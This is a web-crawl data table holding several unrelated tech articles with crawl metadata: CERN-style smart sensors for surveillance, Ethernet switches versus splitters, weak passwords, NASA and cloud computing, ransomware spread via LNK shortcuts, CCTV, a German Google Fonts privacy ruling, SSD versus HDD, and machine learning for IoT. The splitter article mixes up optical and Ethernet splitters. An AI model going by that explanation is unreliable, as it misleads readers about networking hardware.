text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
God particle of Big Data universe discovered: a smart sensor without ICE
In computer science, part of future can be predicted through a simple axiom:”what happens at CERN soon happens everywhere.” We could add a second axiom:””what starts centralized ends up decentralized.” How does this apply to Big Data ?
BIG DATA IS USUALLY SMALL
Many so-calld “Big Data” problems are not that big. The size of 5 years of transactions of a central bank is about 100 GB. One year of central bank transactions can thus fit into a smart-phone. The size of all transactions of an insurance company for a single country is less than 4 TB. Insurance data can fit into a single hard disk.
Many problems of data analysis for which companies are investing expensive infrastructure marked with a fashionable “Big Data” label could actually be solved with a laptop computer – or a even smart-phone – and open source software. Open Source software such as Scikit-Learn , Pandas or NLTK are used by researchers and financial institutions worldwide to process transactional data and customer relation data. Traditional database such as MariaDB can handle nowadays up to 1 million inserts per second. MariaDB 10.0 even includes replication technologies created by Taobao developers that can obviously scale.
My recommendation before going into expensive investments: first purchase a small GNU/Linux server with at least 32 GB memory, a large SSD disk (ex. 1 TB) and study Scikit-Learn machine learning 102 (based on the lecture of Andrew Ng who recently moved to Baidu ). In most cases, it will be enough to solve your problems. If not, you will be able to design a prototype that can later scale on a bigger infrastructure. Scikit-Learn is by the way the toolkit used by many engineers at Google to prototype solutions for their “Big Data” problems.
SMALLEST PARTICLES PRODUCE BIGGEST DATA
Extreme challenges posed by research on nuclear physics and small particles recurrently lead to the creation of new information technologies. HTML was invented by Tim Berners Lee in 1991 at the European Center for Nuclear Research – known as CERN – to solve the problem of large scale document management. The Large Hadron Collider (LHC) of CERN has been designed to process 1 petabyte of data per second. It provided in 2013 a first proof of existence of the Higgs boson , a problem that had remained unsolved for nearly 50 years.
Let us understand what 1 petabyte of data per second means. 1 petabyte is the same as 1,000 terabytes, 1,000,000 gigabytes or 13.3 years of HD video. Being able to process 1 petabyte of data per second is thus equivalent to being able to process the data generated by 419,428,800 (13.3 * 365 * 24 * 3600) HD video cameras. This is 15 times more than the number of CCTV cameras in China and 100 times more than in the United Kingdom .
Overall, technologies created at CERN for small particles could be applied to collect and process in real time all data produced by every human being on the planet in the form of sound, video, health monitoring, smart fabric logs, etc.
INTRODUCING SMART SENSORS
The key concept that explains the success of CERN Big Data architecture is its ability to throw away as soon as possible most of the data that is collected and eventually store only a tiny fraction of it . This is achieved by moving most of data processing to smart sensors that are capable to achieve so-called “artificial intelligence”, in reality advanced statistics also known as machine learning.
One of the sensors at LHC – called the Compact Muon Solenoid (CMS) – collects 3 terabytes of picture data per second that represent small particles colliding. It then throws away pictures that are considered as irrelevant and sends “only” 100 megabit per second to the LHC storage infrastructure, that is 30,000 times less than what it initially collected. The sensor itself uses an FPGA, a kind of programmable hardware that can process data faster than most processors, to implement a machine learning algorithm called “clustering”.
If we wanted to apply to CCTV surveillance the ideas of the LHC, we would possibly store in each video camera a couple of hours of video and use an FPGA or a GPU to process video data in real time, directly inside the camera. We would use re-programmable artificial intelligence to detect the number of people, their gender, their size, their behavior (peaceful, violent, thief, lost, working, etc.), the presence of objects (ex. a suitcase) or the absence of an object (ex. a public light). Only this metadata would be sent over the network to a central processing facility that could decide, if necessary, to download relevant pictures or portions of video. And in case a CCTV area gets disconnected by criminals, a consumer drone could be sent to check out what happens.
Overall, the LHC teaches us how to build quickly an efficient video surveillance system with a smaller investment or a wider reach. This system can be deployed on existing narrow band telecommunication networks – including GSM – anywhere in the world. It is also probably more resilient than systems that store and process everything in a central place. And it can still work off-line or in case of network outage.
SMART PRIVACY, SMART MARKETS
“With the tapping program code-named PRISM, the U.S. government has infringed on the privacy rights of people both at home and abroad” explains the report on the U.S. human rights situation published by Chinese government on 28th Feburary 2014 . Similar programs have been implemented in countries abid strict privacy Law . With 65% market share dedicated to surveillance and strong economic forces behind, Big Data is one of the technologies that can infringe the most on the privacy rights if it is not regulated.
Candidate Markets for Big Data
Smart sensors provide a possible solution, as long their code can be audited by independent authority in charge of privacy. By dropping, encrypting, and anonymising most data, privacy Law can be enforced at the origin, inside the sensor. The risk of abuse of the surveillance system is reduced by the absence of raw data transmission and by the absence of central storage. Sensor access logs can be published as open data to ensure complete auditability.
Upgrading CCTV to smart cameras in China alone represents a yearly market of up to 200 billion RMB. A national upgrade program could be an occasion to build core features of a “smart city” directly inside smart cameras: public Internet access, Web acceleration, Cloudlet, mobile storage offload, geographic positioning, multi-access mesh networking, barrier-free tolling systems, etc. Those are only a few of the many applications that could be developed and later exported worldwide, since China is the largest producer of CCTV systems and already a partner of foreign defense industry .
INTERNET OF THINGS MEANS EVEN BIGGER DATA
By 2020, surveillance will no longer be the primary market of big data. According to Gartner, 26 billion objects will then be connected to Internet , more than 100 times more than the number of CCTV cameras worldwide. Connected objects include industrial sensors in factories, cars, consumer electronics, wind turbines, traffic lights, etc.
Preventive maintenance through failure prediction – a direct application of machine learning and big data – will then be embedded into objects as well as other smart features. GPUs in low cost system on chips (SOC) will be used to implement fast machine learning at low cost .
Chinese industry already has an edge for applications that combine Internet of Things with Big Data. Recent alliance of ARM, Spreadtrum, Allwinner, Rockchip, Huawei and others highlights the growing importance of ARM based solutions designed in China. It is now possible to imagine that in a few years, a System on Chip with GPU, networking and Linux operating system costs less than 1 USD. At this price, it would become the standard component to implement machine learning algorithms for connected smart device. On the higher end, a Big Data cluster could be designed with multi-core ARM System on Chips (SOC) and solid state disks (SSD). And for the first time, all components could be sourced in China at lower cost than Intel for equivalent performance.
Mobile Computing Association (MCA) Established in Shenzhen in April 2014 (Credit. Bob Peng, ARM)
What is probably missing now is software to process data with efficient distributed algorithms. Considering the recent “No ICE Policy ” (a.k.a. “No IOE”) that has been discussed in China and the strong dependency of HADOOP to Java, a product now controlled by Oracle, it could be a good time to consider other software solutions for Big Data. Recently, many communities seem to unify their data processing efforts on python’s Numpy open source technology [20,21] while others create new languages such as Julia . One of the biggest challenges to solve is “out-of-core” data processing, that is processing data beyond the limits of available memory. Projects such asWendelin and Blaze are already on track to provide open source solutions.
Overall, our guess is that “No ICE” solutions will be created in one of the Big Data projects that are launched in China – in Guizhou or in Xinjiang for example – backed by budgets of tens of billions of RMB that open the doors to truly innovative technologies able to cope with exabytes if not zetabytes of data produces by smart sensors.
I would like to thank Thomas Serval of Kolibree , Maurice Ronai of Items , Hervé Rannou of Cityzen Data , Mathias Herberts of Cityzen Data and Alexandre Gramfort of Scikit-Learn for the ideas they shared on Big Data.
Scikit-Learn – http://scikit-learn.org/
Pandas – http://pandas.pydata.org/
NLTK – http://www.nltk.org/
ScaleDB – http://www.scaledb.com/
MariaDB 10.0 annuncement and multimaster replication
LHC – http://en.wikipedia.org/wiki/Higgs_boson#Discovery_of_candidate_boson_at_CERN
Big Brother in China is watching, with 30 million surveillance cameras – http://news.msn.com/world/big-brother-in-china-is-watching-with-30-million-surveillance-cameras-1
Revealed: Big Brother Britain has more CCTV cameras than China – http://www.dailymail.co.uk/news/article-1205607/Shock-figures-reveal-Britain-CCTV-camera-14-people–China.html
The Large Hadron Collider Throws Away More Data Than It Stores – http://gizmodo.com/5914548/the-large-hadron-collider-throws-away-more-data-than-it-stores
Compact Muon Solenoid – http://en.wikipedia.org/wiki/Compact_Muon_Solenoid
FPGA Design Analysis of the Clustering Algorithm for the CERN Large Hadron Collider – http://homepages.cae.wisc.edu/~aminf/FCCM09%20-%20FPGA%20Design%20Analysis%20of%20the%20Clustering%20Algorithm%20for%20the%20CERN%20Large%20Hadron%20Collider.pdf
Parrot Bebop Drone : caméra HD et compatibilité avec l’Oculus Rift – http://www.lesnumeriques.com/robot/parrot-bebop-drone-p20562/parrot-bebop-drone-camera-hd-compatibilite-avec-oculus-rift-n34313.html
Commentary: U.S. should “sweep its own doorstep” on human rights – http://news.xinhuanet.com/english/indepth/2014-02/28/c_133150005.htm
Big Data, Bigger Digital Shadows, and Biggest Growth in the Far East – http://idcdocserv.com/1414
Huawei, Thales, Orange set up video surveillance in Abidjan – http://www.telecompaper.com/news/huawei-thales-orange-set-up-video-surveillance-in-abidjan–975487
Gartner predicts the presence of 26 billion devices in the ‘Internet of Things’ by 2020 – https://storageservers.wordpress.com/2014/03/19/gartner-predicts-the-presence-of-26-billion-devices-in-the-internet-of-things-by-2020/
Python on the GPU with Parakeet – http://vimeo.com/79556629
Mobile Computing Association MCA Established in Shenzhen – http://www.marce.com.cn/china-tablets-industry/arm-counterattack-on-intel-mobile-computing-association-mca-established-in-shenzhen.html
The homogenization of scientific computing, or why Python is steadily eating other languages’ lunch – http://www.talyarkoni.org/blog/2013/11/18/the-homogenization-of-scientific-computing-or-why-python-is-steadily-eating-other-languages-lunch/
China’s No ‘ICE’ Policy – http://www.datacenterdynamics.com/blogs/china%E2%80%99s-no-ice%E2%80%99-policy-0
Anaconda – https://store.continuum.io/cshop/anaconda/
Julia – http://julialang.org/
Wendelin Exanalytics – http://www.wendelin.io/
Blaze – http://blaze.pydata.org/
Guizhou aims to become big data hub – http://guizhou.chinadaily.com.cn/2014-03/03/content_17317216.htm
Big data center to be built in Xinjiang – http://www.chinadaily.com.cn/china/2013-12/04/content_17152426.htm
Révélations sur le Big Brother français – http://www.lemonde.fr/societe/article/2013/07/04/revelations-sur-le-big-brother-francais_3441973_3224.html
Kolibree – http://www.kolibree.com
Items International – http://www.cityzendata.com/
Machine Learning 102:Practical Advice – http://www.astroml.org/sklearn_tutorial/practical.html
Machine learning godfather Andrew Ng joined the Baidu force deep learning – https://www.ctocio.com/ccnews/15615.html
Cityzen Data – http://www.cityzendata.com | <urn:uuid:24a0f1bc-4bc4-4f6f-bc1b-7a37f2b63022> | CC-MAIN-2022-40 | https://www.ctocio.com/big-data-2/15730.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00754.warc.gz | en | 0.871801 | 3,618 | 3.140625 | 3 |
Today, our lives hardly do without Internet communication. We do shopping, letter writing and business all relying on the Ethernet connections both at home and office. And Gigabit Ethernet switch and splitter are the networking devices that are primarily used for connecting different computers or other networking devices. However, they are quite different. Here focus on Ethernet switch vs splitter.
Ethernet Switch vs Splitter: What Are They?
First, let’s figure out the definitions of the two terms.
An Ethernet switch is a high speed networking device that provides more ports for subnets to connect more computers, printers, cameras and so on in a building or campus. Through the ports, the data switch can receive incoming data packets and redirects the data to their intended destination within a LAN. Usually, an Ethernet switch not only works at the data link layer which is also called layer 2, but also can operate at the network layer (layer 3) or above.
A network splitter acts as the optical power distribution device, like a coaxial cable transmission system. It’s one of the most important passive devices which means it doesn’t need external power except for light. As the name implies that it can split a single Internet connection to create extra connections, as a result the additional or other computers on a network could be connected.
Ethernet Switch vs Splitter: What Are the Differences?
Ethernet switch can be used for networks that include different devices, for example, a computer and a video game console or a printer. In addition, general switch needs a power input so that it can divide an Ethernet signal into various signals, and the signals can operate at the same time. As a result, different devices can be connected by the switch and work simultaneously.
As for Ethernet splitter, there is no need for power input. And splitters need to be used in pairs. It physically splits a single Ethernet connection into two connections. Simply put, if you want to connect two computers in one room and a switch in another room, then you need the splitters. Instead of using two Ethernet cables from one room to another, the splitters can physically split one Ethernet cable into two to connect the computers and the switch. This is the main principle for the issue that how to use Ethernet splitter.
Ethernet Switch vs Splitter: Where to buy?
The following products of Ethernet splitter vs switch are from FS.COM.
This is a 10gb Ethernet switch that has 48×1GbE SFP ports and 4×10GbE SFP+ ports. With a switching capacity of 176Gbps, it supports comprehensive L2 and L3 network management features. The switch offers MLAG, MPLS, IPv4/IPv6, SNMP etc. Designed with the max power draw of 75W and switching capacity of 176Gbps, this switch is ideal for traditional or fully virtualized data center.
Figure 1: S5800-48F4S Switch
As for Ethernet switch vs splitter, we have known how do Ethernet splitters work and how do switch work. Both of them can optimize our network that allow us to work in an efficient and high secure way. Welcome to visit FS.COM to pick your own Ethernet switch and splitter. | <urn:uuid:7e064054-ace0-466b-a5fc-c2a169a770cf> | CC-MAIN-2022-40 | https://www.fiber-optical-networking.com/ethernet-switch-vs-splitter-much-know.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00754.warc.gz | en | 0.914911 | 678 | 3.203125 | 3 |
Internet users are often blamed for weak password security, but who’s really responsible? –The users for setting a weak password, or websites for allowing it.
You don’t need to be a world class hacker to know that “1,2,3,4,5” isn’t quite the most effective password available. Often times, internet users generating weak passwords for the sake of convenience is the main reason they become vulnerable to security threats. However, studies show that the reality is, websites are not doing much to ensure the security of our online accounts.The solution would seem rather obvious than, right? Generate a stronger password. Now before you close this case, you must understand that that websites will not implement this policy any time soon. The reason for that is simple, website developers are faced with choosing between security and usability. Often companies will choose the later, as mass appeal will trump mass protection.
Even though certain website sign ups seem tedious when they ask for certain password qualifications,the reality is these are the sites that are going to ensure your privacy. According to Security Editor, Dan Goodin the reason that so many users continue to use weak passwords is because websites are not enforcing policies that require stronger ones.
Even major corporations such as Google and Facebook are allowing users to create weak passwords to maintain easy account set up. It is up to websites to enforce stronger password security policies. Currently, certain companies are creating general password blacklists that will enforce certain passwords cannot be used. Until every website implements these rules it is highly recommended to create a password with lowercase, uppercase, special and numeric characters.
No one can force you to take the necessary measures to ensure your information. While users are creating weaker passwords, internet security is a two way street. At Affant, your security is always our first priority. With24/7 monitoring and security, we guarantee that if your password is ever breached, Affant is on your side.
Affant Director of Engineering since 2000. Management of engineering and support team, Escalation of all technical and client issues. Sales and design engineer. | <urn:uuid:657bc5f4-a07a-41b7-9c96-c7d2a2ec3a89> | CC-MAIN-2022-40 | https://affant.com/weak-passwords-are-users-really-to-blame/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00754.warc.gz | en | 0.941424 | 440 | 2.5625 | 3 |
The powerful, refrigerator-sized computers that were once a hallmark of corporate and research data centers have steadily lost ground to off-the-shelf servers over the years.
Mind you, mainframes still alive and kicking, but they’ve been relegated to workloads that require secure and dedicated data processing. Think moneyed financial firms, energy producers and other organizations and government agencies where secrecy and security are top priorities — even if it comes at the cost of some flexibility.
“The end-user interfaces are clunky and somewhat inflexible, but the need remains for extremely reliable, secure transaction oriented business applications,” writes Cureton.
In retrospect, it’s kind of hard to imagine NASA without its mainframes. In popular culture, visuals of chunky, blinking caverns of computer equipment — complete with reel-to-reel tape — are as synonymous as the agency’s scientists and space-faring exploits.
Exploring and pioneering clouds
Today, the reality is different. In recent years, the federal government as a whole is looking to efficient, cost-cutting ways of getting the computing power it needs. The solution, in large part, is cloud computing.
NASA’s own Nebula cloud computing platform is an effort to give engineers and researchers a bigger pool of computing power and grant its partners and the public access to its data sets. But the space agency is more than an adopter, it’s also a pioneer.
NASA and Rackspace are behind the open source cloud platform called OpenStack. Of late, the technology has attracted an impressive number of supporters including mega-carrier AT&T. And startups like Cloudscaling and Piston Cloud Computing — the latter of which was co-founded by NASA Nebula Chief Technical Architect Joshua McKenty — are bringing OpenStack-based private clouds to enterprises.
So, as NASA bids farewell to the mainframe, it’s doing more than its part to advance the cloud. Fitting, isn’t it?
Image credit: NASA | <urn:uuid:42322a62-091d-4bf3-80d6-b5b80c8ae87b> | CC-MAIN-2022-40 | https://www.ecoinsite.com/2012/02/nasa-mainframe-cluster-cloud-computing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337631.84/warc/CC-MAIN-20221005140739-20221005170739-00754.warc.gz | en | 0.937054 | 426 | 2.6875 | 3 |
Ransomware developers are always on the lookout for new ways to make money out of infecting people. Phishing schemes, malicious ads, infected email spam. As if these weren’t enough, now there’s a new way to spread ransomware, through the PCs shortcuts.
How Does the LNK infection Happen?
The shortcut method of distributing malware relies on putting the malware into LNK files, better known as shortcuts. The most common way of spreading ransomware is to attach a zip file onto an e-mail. The ransomware distributed through shortcuts works pretty much the same way, except the attached file is a shortcut of something the user would want to open.
How Can You Distinguish Malware Shortcuts
First of all, shortcuts have a small arrow inside their icon, while other files do not. Here a picture demonstrating the difference bellow. The shortcut is on the right:
You can also check if a file is a shortcut by:
- Right clicking on it
- Selecting Properties
- Going to General
Protection Against Shortcut Ransomware
A good rule of thumb when it comes to infected files through email is to avoid suspicious email attachments that look off. You can search for these telltale signs:
- Avoid suspicious email attachments. Don’t download ZIP or LNK files attachments under titles like “Your Computer Is At Risk” or something from the bank, or an e-commerce store. Official services almost never send ZIP files or shortcuts
- Don’t download shortcut files. If an LNK file is sent to you via email, its best not to download it. Look for the small arrow that indicates a shortcut, as seen above
There are also other ways of protecting yourself against ransomware. You can apply filters to your email address, blocking emails containing EXE, ZIP or LNK files. Also, download an anti-virus program if you haven’t already.
What Can You Do If You Get Infected by Ransomware
If your PC falls to a ransomware virus, you should do one of the following things:
- Don’t pay the ransom, as there’s no guarantee your system will be restored.
- Try to get rid of it by using this guide for manually removing malware from your computer
- Download an anti-malware tool and scan your system with it. That can also prove very useful for prevention of malicious content in the future, including ransomware.
If you get infected by a ransomware attack, be sure to check our section dedicated to combating this type of virus. | <urn:uuid:fe87a389-0452-4e65-bf4e-cead93503260> | CC-MAIN-2022-40 | https://bestsecuritysearch.com/ransomware-viruses-taking-shortcut-infection/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.893425 | 532 | 2.59375 | 3 |
Major cities are the homes of millions of people. Therefore, public safety is essential to ensure a secure environment. Although you can’t watch citizens’ every move, you can keep an eye on highly populated areas such as public spaces and highways. Read about the uses of closed-circuit cameras in major cities for more information.
Did you know people are less likely to commit a crime if a camera is monitoring them? Many establishments use closed-circuit cameras to keep track of customer actions and monitor building activity. You may notice surveillance cameras in banks, retail stores, and restaurants. The cameras aid in preventing theft and vandalism. In major cities, crime rates are an increasingly prevalent problem. However, closed-circuit cameras do prevent crime to a certain extent. Since these cameras record people’s actions, they stray away from petty crimes.
Many major cities have a traffic monitoring system that uses closed-circuit cameras to detect accidents and congestion. This alerts a database and first responders in the event of an emergency. At other times, closed-circuit cameras can identify speeding and people running through red lights. Many drivers tend to speed in tunnels because they think cameras aren’t watching. However, this isn’t the case. Most underground tunnels require industrial networking that tracks traffic flow in a tunnel’s entrance, interior, or exit.
Public Space Monitoring
The next time you’re in a public space, you may notice surveillance cameras. Public spaces include sports arenas, clubs, vacation areas, businesses, and tourist sites. Ultimately, anywhere that has a continuous flow of people is considered a public space. Therefore, it’s essential to monitor the area. People can find closed-circuit cameras on top of buildings, in corners, or planted in specific areas. These cameras ensure public safety by keeping a watchful eye on the area. In addition, video footage from the cameras can serve as evidence in criminal cases in the event of a crime.
Closed-circuit cameras ensure public safety by keeping recorded footage of citizen activities in public spaces. These cameras also help prevent crimes and monitor traffic. If you’re wondering about surveillance in cities, always look back at the uses of closed-circuit cameras in major cities for information. | <urn:uuid:7f6cb685-62cc-456d-a3bb-7ecbb76e2797> | CC-MAIN-2022-40 | https://coruzant.com/security/uses-of-closed-circuit-cameras-in-major-cities/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.93902 | 472 | 2.84375 | 3 |
Typefaces can be a tricky business, both technically and legally.
Before word processors, laser printers and digital publishing, printed materials were quite literally “set in metal” (or wood), with typesetters laying out lines and pages by hand, using mirror-image letters cast on metal stalks (or carved into wooden blocks) that could be arranged to create a back-to front image of the final page.
The laid-out page was effectively a giant stamp; when inked up and pressed against a paper sheet, a right-way-round image of the printing surface would be transferred to the page.
For books printed in Roman script, typesetters kept multiple copies of each letter in separate pigeonholes in a handy tray, or printer’s case, making them easy to find at speed. The capital letters were kept in their own case, which was placed by convention above the case containg the small letters, presumably so that the more commonly-used small letters were closer to hand. Thus capital letters came from the upper case, and small letters from the lower case, with the result that the terms upper case and lower case became metaphorical phrases used to refer to the letters themselves – names that have outlived both printers’ cases and movable type.
Getting the right look
Designing a typeface (or “font”, as we somewhat inexactly refer to it today) that is both visually appealing and easy to read, and that retains a unique and attractive look across a range of different sizes, weights and styles, is an astonishingly complex task.
Indeed, although the digital age has made it easy to create new fonts from scratch, and cheap to ship them as computer files (another physical document metaphor that has survived into the computer era), designing a good typeface is harder than ever.
Users expect the font to look good not only when scaled up or down to any size, including fractions of a millimetre, but also when displayed or printed as a collection of separate pixels at a variety of resolutions using a range of different technologies.
As a result, good typefaces can be expensive, especially if you want to adopt a font collection as a company standard for your corporate identity, and you want to license it correctly for all possible uses, including on the web, in print, for editorial, in advertising, on posters, in films and videos, for redistribution embedded in presentations and documents, and more.
“Free” font collections abound online, but – as with videos, music, games and other artistic content – many of these downloads may leave you with dubiously licensed or even outright pirated fonts installed on your computer or used in your work.
Nevertheless, many distinguished font creators provide open source fonts available for personal and commercial use, and numerous free-and-properly-licensed font collections do exist, including the well-known Google Fonts.
In fact, the Google Fonts site not only allows you to download font files to use in your own documents or to copy onto your own web servers to embed into your web pages…
…but also allows you to link back to a Google Font server so you don’t even need to host the file yourself.
For boutique websites, that’s convenient because it means you get font updates automatically, and you don’t have to pay any bandwidth fees to your hosting provider for sending the font file to every visitor.
Local or cloudy?
On the Naked Security website, for example, our body text [2022-01-31] is set in a typeface called Flama, which isn’t open source.
So, we host the font file ourselves and serve it up as part of the web page, from the same domain as the rest of the site, using an
@font-face style setting, in the fashion you see here:
This means that even though you are unlikely to have Flama installed yourself, our website should render with it in your browser just as it does in ours, using the WOFF (Web Open Font Format) version of the font file.
The Flama WOFF font you see below is modestly sized at just 26KBytes, but is our responsibility to serve up as needed:
Licensing and serving in one place
So, Google Fonts not only “solves” your licensing issues by offering open source fonts that you are allowed to use commercially, it can also solve your “how to serve it” hassles, too.
You simply link to a Google-hosted web stylesheet (CSS) page that sets up the necessary
@font-family specifications for you, and fetched the desired font files from the Google Fonts service, like this:
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=fontyouwant">
Of course, that means that Google’s servers get a visit from your browser, and thus Google unavoidably gets your IP number (or an IP number provided by your ISP or VPN provider, which loosely amounts to the same thing).
If you have some sort of tracking protection turned on, your browser might not fetch the requested CSS and font data, in which case you’ll see the text in the closest available font your browser has available.
But if you haven’t set your browser to block these downloads, you’ll get the font and Google will get your IP number.
Is that private enough?
Apparently, not always.
A District Court in Munich, Germany, recently heard a legal complaint in which the plaintiff argued that a website that had linked across to Google Fonts, instead of downloading and hosting a copy of the free font on its own site, had violated their privacy.
The court agreed, demanded that the website operator start hosting fonts locally, and awarded the complainant damages of €100 (about $110).
The court’s argument doesn’t seem to be suggesting any and all other third party “widget linking” is now considered illegal in Germany (or, more particularly, in the region where this court holds sway), but only that websites are expected to host content locally if that’s easily possible:
Google Fonts kann durch die Beklagte auch genutzt werden, ohne dass beim Aufruf der Webseite eine Verbindung zu einem Google-Server hergestellt wird und eine Übertragung der IP-Adresse der Webseitennutzer an Google stattfindet.
(The defendant [i.e. the website operator] can make use of Google Fonts without establishing a connection to a Google server, and without the IP address of the website user being transmitted to Google.)
If you’ve ever had rogue adverts – what’s known as malvertising – thrust into your browser when you’ve visited an otherwise unexceptionable and trustworthy website, you might be thinking, “This is a great decision, because if everyone who monetised ads served them up from their own domains, it would be much easier to keep track of who was responsible for what, and ad filtering would become a whole lot simpler.”
There’s also the problem that this judgement has penalised a website provider for linking to a Google service that has (or at least claims to have) a pretty liberal privacy and tracking policy:
The Google Fonts API is designed to limit the collection, storage, and use of end-user data to only what is needed to serve fonts efficiently.
Use of Google Fonts API is unauthenticated. No cookies are sent by website visitors to the Google Fonts API. Requests to the Google Fonts API are made to resource-specific domains, such as fonts.googleapis.com or fonts.gstatic.com. This means your font requests are separate from and don’t contain any credentials you send to google.com while using other Google services that are authenticated, such as Gmail.
Yet the judgement is of necessity mute about embedded links that track users as part of their service, such as web analytics tools, because those services are almost always cloud-based by design, and therefore cannot be hosted locally.
Are those to be made illegal in Bavaria, too? Or will the cloud-centric nature of web analytics effectively exempt analytics services from this sort of judgement simply because the expectation is that they’re rarely, if ever, hosted locally?
And what about so-called “live content” from other sites?
Twitter, for example, requires that if you want to show a complete tweet in your web page, you need to embed it directly, rather than locally hosting a screenshot and providing a link that a user can optionally click later on.
From a traffic point of view, that makes sense for Twitter, because “live” links not only display current tweet statistics, but also make it really easy for readers to engage frictionlessly with the tweet.
But it also makes sense from a legal and cybersecurity point of view, because Twitter itself can adapt data that’s embedded via links to its site (such as deleting offensive, illegal or misleading content as desired or required), instead of relying on every website that ever took a screenshot of a tweet to go back and update or remove the content if common sense or a court order demands it.
Have your say
Where do you stand on this?
Do you think this is an overreach by the court?
Do rulings like this suggest we’re heading towards the end of the era of third-party adverts (after all, adverts don’t have to be served via the cloud; they all could be served locally, even if most services don’t yet support that way of working, and even if it’s a lot less convenient)?
Let us know below… you many remain anonymous if you like. | <urn:uuid:33d55925-2310-44f0-9160-764a9ec779f0> | CC-MAIN-2022-40 | https://cybersecurityworldconference.com/2022/01/31/website-operator-fined-for-using-google-fonts-the-cloudy-way/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.929619 | 2,247 | 2.859375 | 3 |
A drive is a drive, right? Not at all. Allow us to explain the differences between SSD technology and HDD technology.
Hard disk drives (HDDs) are primarily found in computers and laptops. Solid state drives (SSDs) are becoming more common in computers and laptops, and are also found in tablets, cell phones, portable drives and mp3 players.
Consider the familiar USB memory stick. A solid state drive is a larger, more sophisticated version of your traditional thumb drive. Like a memory stick, the SSD stores information on microchips and contains no moving parts. Meanwhile, a hard disk drive records information on a storage platter by moving a mechanical arm with a read/write head over a spinning platter.
The platter inside the hard disk drive is coated with a magnetic media which records data in binary code (1's and 0's). A solid state drive does not contain magnetic coatings. Instead, SSDs rely on an embedded processor, or "brain", and interconnected flash memory chips that retain data even when no power is present.
When destroying HDDs and SSDs that are no longer needed, their technology must be taken into consideration. A degausser has the ability to erase information stored on a hard disk drive because it is magnetic media. However, a degausser will prove ineffective at erasing data from a solid state drive, because SSDs do not contain erasable magnetic coatings. Instead, solid state drives should be physically destroyed with a device like the SSMD-2MM Solid State Media Disintegrator. | <urn:uuid:607df032-38b4-493f-83ad-1d21a1ba24df> | CC-MAIN-2022-40 | https://datasecurityinc.com/solid_state_storage_devices.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334514.38/warc/CC-MAIN-20220925035541-20220925065541-00154.warc.gz | en | 0.923399 | 319 | 3.453125 | 3 |
What is Machine Learning
Machine learning is a branch of artificial intelligence (AI) and is what allows computers to continuously learn and improve. What makes machine learning stand out is the fact that computers are able to ‘learn and improve’ on their own and not have to be programmed and re=programmed.
Machine learning is concerned with the creation of computer programs that can access data and learn on their own. Learning starts with data such as examples, direct experience, or teaching so that we can seek patterns in data and make better decisions in the future based on the examples we provide. The main goal of implementing machine learning is to allow computers to learn on their own, without the need for human interaction, and adapt their activities accordingly.
What is IoT?
The Internet of Things (IoT) is a network of physical devices (‘things’) that are embedded with sensors, software, and other technologies. What exactly makes these physical objects unique? It has to be their ability to connect and exchange data with other devices and systems over the internet. Such devices range in complexity from common household items to sophisticated industrial instruments.
Experts predict that by 2020, there will be more than 10 billion connected IoT devices, and 22 billion by 2025. Oracle has a device partner network. Connecting these diverse products and attaching sensors to them gives devices a level of digital intelligence that will make the life of the everyday user a little easier. This pushes devices to be able to convey real-time data without involving a person.
Why use Machine Learning for IoT?
Machine learning can reduce human errors, allowing collected data to provide real-time insights. Insights produced allow IoT devices to fulfill their full potential. Machine learning and IoT provide insights that are hidden in data for rapid automated responses and improved decision-making. By applying machine learning, IoT devices are able too predict and behave based on their own.
There’s never a dull moment when it comes to big data and artificial intelligence. Their benefits and future potential open doors to innovation across industries. Meanwhile, businesses are increasingly adding sensors in the hopes of increasing efficiency and lowering costs. According to InData Labs‘ machine learning consultants, without a suitable data management and analysis plan, are only making more noise and filling up more servers without being exploited to their full potential.
How is machine learning used for IoT?
1. Smart home
Smart home devices can range from everyday items such as smart lighting and tvs. So why integrate IoT sensors, machine learning models, machine learning algorithms, and big data analytics? The purpose of this integration is to make the home more helpful and responsive to the user’s needs and routines. IoT platforms can help by predicting them by collecting data in real-time, instead of having to entirely rely on commands and manually programmed routines.
2. Smart cars
Autonomous vehicles might only still be in the testing phase but have made a reality through in the automotive industry. By using supervised machine learning models and algorithms, car manufacturers are able to implement and monitor the way vehicles behave when faced with a wide range of scenarios and for developing advanced driver-assistance systems.
A few examples where machine learning is being used when driving a car include:
- Proactive detection and classification of objects
- Driver monitoring
- Driver replacement
- Sensor fusion
- Vehicle powertrain
The goal of machine learning is to mimic how the human brain analyzes information in order to develop logical responses. Machines require an algorithm if they rely on learning, training, or experience. Furthermore, when we gain more knowledge, we alter our reflexes, improve our skills, and begin to use our efforts judiciously. The goal of machine learning is to replicate this self-regulatory behavior in machines.
Data analysis automation
Consider the case of automobile sensors. When a car is on the move, hundreds of data points are recorded by inbuilt sensors. The data collected must be processed in real-time to avoid the possibility of accidents while also providing comfort to passengers. Because a human analyst would be unable to undertake such a task for each car, automation is the only option.
Machine learning allows the vehicle’s central computer system, similar to the central nervous system of a human, to learn about potentially harmful scenarios, such as speed and friction characteristics, and activate safety systems when required.
The predictive power of Machine Learning
Looking back at the case of automobile sensors as an example, the true value of IoT rests not just in detecting the immediate threats, but also in finding common patterns. For instance, the system may learn about a motorist who makes too tight corners or has trouble parallel parking. The system then constructs itself in being able to assist the driver by providing more instructions.
